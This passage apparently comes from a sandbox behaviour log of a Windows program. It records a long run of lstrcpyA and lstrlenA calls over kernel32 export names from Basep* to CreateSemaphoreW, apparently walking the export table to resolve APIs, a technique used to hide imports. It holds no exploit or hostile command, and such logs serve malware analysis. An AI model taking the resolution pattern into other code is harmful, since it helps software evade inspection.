(lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.098] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.098] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.098] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.098] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.098] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.098] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.098] lstrlenA (lpString="BEEP") returned 4 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.098] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.098] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.098] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.099] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.099] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.099] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.099] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.099] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.099] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.099] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.099] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.099] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.099] lstrlenA (lpString="CANCELIO") returned 8 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.099] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.099] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.099] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.099] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.099] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.099] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.099] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.099] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.099] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.100] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.100] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.100] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.100] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.100] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.100] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.100] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.100] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.100] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.100] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.100] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.100] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.100] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.100] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.100] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.100] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.100] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.100] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.100] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.100] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.101] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.101] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.101] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.101] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.101] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.101] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.101] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.101] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.101] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.101] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.101] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.101] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.101] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.101] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.101] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.101] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.101] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.101] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.101] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.101] lstrlenA (lpString="COPYFILEA") returned 9 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.102] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.102] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.102] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.102] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.102] lstrlenA (lpString="COPYFILEW") returned 9 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.102] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.102] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.102] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.102] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.102] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.102] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.102] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.102] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.102] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.102] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.102] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.102] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.102] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.102] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.102] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.103] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.103] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.103] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.103] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.103] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.103] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.103] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.103] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.103] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.103] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.103] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.103] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.103] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.103] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.103] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.103] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.103] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.103] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.103] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.104] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.104] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.104] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.104] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.104] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.104] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.104] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.104] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.104] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.104] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.104] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.104] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.104] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.104] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.104] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.104] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.104] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.104] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.104] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.104] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.105] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.105] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.105] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.105] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.105] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.105] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.105] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 